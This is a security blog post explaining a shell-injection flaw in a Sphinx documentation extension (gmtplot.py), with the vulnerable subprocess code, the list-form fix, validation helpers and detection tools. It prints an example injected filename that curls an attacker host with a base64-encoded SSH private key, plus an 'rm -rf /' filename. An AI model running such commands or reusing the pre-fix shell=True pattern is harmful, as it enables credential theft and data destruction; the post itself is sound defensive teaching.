Back to Blog
critical SEVERITY9 min read

Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk

A critical shell injection vulnerability was discovered and fixed in a Sphinx documentation extension (gmtplot.py), where subprocess calls using shell=True allowed arbitrary command execution through crafted filenames in RST documentation files. This fix demonstrates how even documentation tooling can become an attack vector when user-controlled input reaches shell interpreters without sanitization. Understanding and remediating this class of vulnerability is essential for any project that proce

O
By orbisai0security
May 11, 2026
#shell-injection#python#subprocess#command-injection#sphinx#documentation-security#secure-coding

Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk

Severity: Critical | CVE Class: Command Injection (CWE-78) | Fixed In: PR - "fix: sanitize subprocess call in gmtplot.py"


Introduction

When developers think about attack surfaces, they typically focus on web endpoints, authentication systems, or data storage. Rarely does anyone look twice at the documentation pipeline. Yet documentation tooling — especially custom Sphinx extensions that process contributor-supplied content — can harbor some of the most dangerous vulnerabilities in a codebase.

This post covers a critical shell injection vulnerability discovered and fixed in gmtplot.py, a custom Sphinx extension used to render GMT (Generic Mapping Tools) plots in documentation. The vulnerability allowed an attacker with the ability to contribute RST documentation files to execute arbitrary shell commands on any machine that built the documentation.

If your CI/CD pipeline builds docs automatically — and most modern projects do — this means remote code execution on your build infrastructure.


The Vulnerability Explained

What Is Shell Injection?

Shell injection (also known as OS command injection) occurs when an application passes unsanitized, user-controlled data to a system shell interpreter. When Python's subprocess.run() is called with shell=True, the entire command string is handed to /bin/sh for interpretation. This means the shell will parse and execute any valid shell syntax embedded in the string — including metacharacters like:

Metacharacter Effect
; Execute next command sequentially
\| Pipe output to another command
&& Execute next command if first succeeds
` ` Command substitution (backticks)
$() Command substitution (modern syntax)
> / >> Redirect output to a file

The Vulnerable Code

In docs/source/_extensions/gmtplot.py, at lines 173, 174, and 197, the extension invoked subprocess.run() like this:

# VULNERABLE CODE (before fix)
import subprocess

# ps_images[0] is derived from user-supplied RST documentation content
ps_file = ps_images[0]

# shell=True + unsanitized input = shell injection
subprocess.run(f"gmt psconvert {ps_file} -A -Tg", shell=True)
subprocess.run(f"gmt psconvert {ps_file} -A -Tf", shell=True)

# Also vulnerable at line 197
subprocess.run(f"convert {ps_file} output.png", shell=True)

The variable ps_images[0] is a file path derived from the processing of RST source files — content that documentation contributors control.

How Could It Be Exploited?

An attacker who can submit a pull request (or directly push to a branch) containing RST documentation files can craft a filename or directive that injects shell commands. Here's a concrete example:

Step 1: The attacker contributes an RST file containing a GMT plot directive with a malicious path:

.. gmtplot::
    :caption: Innocent-looking map

    # Script that generates a file with a dangerous name

Step 2: The extension processes this and constructs a path like:

legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) #

Step 3: When subprocess.run() executes with shell=True, the shell sees:

gmt psconvert legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) # -A -Tg

The shell dutifully executes both the legitimate GMT command and the attacker's injected command.

Real-World Impact

The consequences depend on the context in which documentation is built, but consider:

  • CI/CD Compromise: Most projects auto-build docs in pipelines. A malicious PR could exfiltrate secrets, install backdoors, or pivot to internal infrastructure.
  • Developer Machine Compromise: Any developer who checks out the branch and runs make html locally becomes a victim.
  • Supply Chain Attack: If documentation is built as part of a release process, an attacker could tamper with build artifacts or inject malicious code into published packages.
  • Secret Exfiltration: Build environments commonly contain API keys, cloud credentials, SSH keys, and deployment tokens — all accessible to injected commands.

This is not theoretical. Similar vulnerabilities have been exploited in CI/CD systems to steal secrets and compromise software supply chains.


The Fix

What Changed?

The fix eliminates the root cause by removing shell=True and passing command arguments as a list instead of a string. When subprocess.run() receives a list, Python uses execvp() to run the process directly — no shell is involved, and therefore no shell metacharacter interpretation occurs.

# FIXED CODE (after fix)
import subprocess
import shlex

# ps_images[0] is still user-derived, but now safely handled
ps_file = ps_images[0]

# Pass as a list — no shell involved, metacharacters are treated as literals
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tg"], check=True)
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tf"], check=True)

# Also fixed at line 197
subprocess.run(["convert", ps_file, "output.png"], check=True)

Why This Works

When you pass a list to subprocess.run():

  1. Python calls os.execvp() (or equivalent) directly
  2. The operating system treats each list element as a discrete argument
  3. No shell is spawned, so no shell parsing occurs
  4. A filename like file.ps; rm -rf / is passed literally as the filename argument to gmt psconvert — the semicolon is just a character, not a command separator

The attack is completely neutralized because the shell — the interpreter that gives metacharacters their power — is never invoked.

Additional Hardening (Defense in Depth)

Beyond the primary fix, consider these additional hardening measures:

import subprocess
import os
from pathlib import Path

def safe_convert(ps_file: str, output_dir: str) -> None:
    """Safely convert PS file with input validation."""

    # 1. Validate the file exists and is within expected directory
    ps_path = Path(ps_file).resolve()
    allowed_base = Path(output_dir).resolve()

    if not ps_path.is_relative_to(allowed_base):
        raise ValueError(f"Path traversal detected: {ps_file}")

    # 2. Validate file extension
    if ps_path.suffix.lower() not in ('.ps', '.eps'):
        raise ValueError(f"Unexpected file type: {ps_path.suffix}")

    # 3. Use list form (no shell=True) — primary defense
    result = subprocess.run(
        ["gmt", "psconvert", str(ps_path), "-A", "-Tg"],
        capture_output=True,
        text=True,
        timeout=60,  # 4. Add timeout to prevent resource exhaustion
        check=True   # 5. Raise on non-zero exit code
    )

Prevention & Best Practices

The Golden Rule: Never Use shell=True with External Input

This is the single most important takeaway. Python's subprocess documentation itself warns:

"Using shell=True can be a security hazard... Do not use shell=True when the command string is constructed from external input."

Follow this decision tree:

Do you need shell features (pipes, redirects, globs)?
├── YES  Can you redesign to avoid them?
│         ├── YES  Redesign (preferred)         └── NO   Use shell=True ONLY with fully hardcoded strings                   Never interpolate external data
└── NO   Always use shell=False (list form)

Input Validation and Allowlisting

When you must work with user-supplied paths or filenames, validate them strictly:

import re
from pathlib import Path

def validate_plot_filename(filename: str) -> bool:
    """Allowlist-based filename validation."""
    # Only allow alphanumeric, hyphens, underscores, dots
    if not re.match(r'^[a-zA-Z0-9_\-]+\.(ps|eps)$', filename):
        return False
    # Prevent path traversal
    if '..' in filename or '/' in filename:
        return False
    return True

Use shlex.quote() as a Last Resort

If you absolutely cannot avoid shell=True, use shlex.quote() to escape arguments:

import shlex
import subprocess

# Last resort only — prefer list form instead
safe_path = shlex.quote(ps_file)
subprocess.run(f"gmt psconvert {safe_path} -A -Tg", shell=True)

⚠️ Warning: This is a mitigation, not a cure. The list-form approach is always preferred.

Relevant Security Standards

Standard Reference Description
OWASP A03:2021 – Injection Injection ranks #3 in OWASP Top 10
CWE CWE-78 OS Command Injection
CWE CWE-88 Argument Injection
SANS CWE/SANS Top 25 Most Dangerous Software Errors

Detection Tools

Add these to your security pipeline to catch similar issues:

  • Bandit — Python-specific SAST tool; detects shell=True usage (rule B602, B603)
    bash pip install bandit bandit -r . -t B602,B603
  • Semgrep — Pattern-based code scanning with rules for subprocess misuse
    bash semgrep --config "p/python" .
  • CodeQL — GitHub's semantic code analysis; has built-in queries for command injection
  • Safety — Scans Python dependencies for known vulnerabilities
  • Pre-commit hooks — Run Bandit automatically before every commit

Secure Code Review Checklist

When reviewing code that invokes subprocesses, ask:

  • [ ] Is shell=True used? If so, is it absolutely necessary?
  • [ ] Does any part of the command string come from external input (files, environment, user input, network)?
  • [ ] Are file paths validated against an allowlist of expected directories?
  • [ ] Is there a timeout to prevent resource exhaustion?
  • [ ] Are errors handled to prevent information leakage via exception messages?
  • [ ] Is the principle of least privilege applied (does the process need all these permissions)?

A Note on Documentation Pipelines

This vulnerability highlights a frequently overlooked truth: your documentation pipeline is part of your attack surface.

Modern documentation workflows often include:

  • Automatic builds triggered by pull requests from external contributors
  • Sphinx extensions that execute code to generate examples and plots
  • Jupyter notebooks rendered as documentation
  • Auto-generated API docs that execute import statements

Each of these is a potential code execution vector. Treat your documentation build environment with the same security rigor as your production build:

  1. Sandbox doc builds in isolated environments with no access to production secrets
  2. Require review before building PRs from first-time contributors
  3. Use separate secret stores — doc build environments should not have the same credentials as release pipelines
  4. Audit custom Sphinx extensions — they often run with full filesystem and network access

Conclusion

A single shell=True in a documentation extension turned a benign plot-rendering tool into a potential remote code execution vulnerability. The fix was straightforward — replace string interpolation with a properly structured argument list — but the implications were significant.

Key takeaways:

  1. shell=True + user input = shell injection. This is one of the most reliable rules in security.
  2. Documentation tooling is an attack surface. CI/CD pipelines that auto-build docs are especially at risk.
  3. The fix is simple: use subprocess.run(["cmd", "arg1", "arg2"]) instead of subprocess.run(f"cmd {arg}", shell=True).
  4. Layer your defenses: input validation, path restrictions, and static analysis tools complement the primary fix.
  5. Automate detection: Bandit and Semgrep can catch these issues before they reach production.

Security vulnerabilities don't only live in authentication systems and API endpoints. They hide in build scripts, test helpers, and documentation generators — the parts of a codebase that developers trust implicitly. The best defense is consistent, skeptical review of any code that touches external input, regardless of how "internal" it seems.

Secure every layer. Trust no input.


This vulnerability was identified and fixed as part of an automated security scanning process. If you maintain Sphinx extensions or other documentation tooling that invokes subprocesses, audit your code for similar patterns today.

References: CWE-78 | OWASP Injection | Python subprocess docs | Bandit B602

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #246

Related Articles

critical

Stack Buffer Overflow in MapScale: How Five Unsafe sprintf Calls Created a Critical Vulnerability

A critical stack-based buffer overflow vulnerability was discovered and patched in `src/mapscale.c`, where five unbounded `sprintf` calls wrote formatted output into fixed-size stack buffers without any bounds checking. An attacker controlling unit text strings could overflow the stack buffer, potentially overwriting the function return address and achieving arbitrary code execution. The fix replaces dangerous `sprintf` calls with their bounds-checked counterparts, eliminating the overflow risk

critical

Heap Buffer Overflows in YAML Parser: How Unchecked memcpy Calls Create Critical Attack Vectors

A critical heap buffer overflow vulnerability was discovered and patched in the YAML parser embedded within an Android VPN application, where five unvalidated `memcpy` calls could allow an attacker to corrupt heap memory by supplying a crafted YAML configuration file. This class of vulnerability is particularly dangerous because it can lead to arbitrary code execution or application crashes in security-sensitive contexts. The fix adds proper bounds validation before each copy operation, eliminat

critical

Critical Buffer Overflow Fixed: When "Safe" Functions Aren't Safe

A critical vulnerability in DeepSkyStackerKernel's StackWalker.cpp was silently replacing bounds-checking string functions with their unsafe counterparts via preprocessor macros, exposing the entire codebase to buffer overflow attacks. This fix removes the dangerous macro definitions that discarded buffer size arguments, restoring the intended memory safety protections across all call sites. Understanding how this subtle macro trick works is essential for any C/C++ developer working with string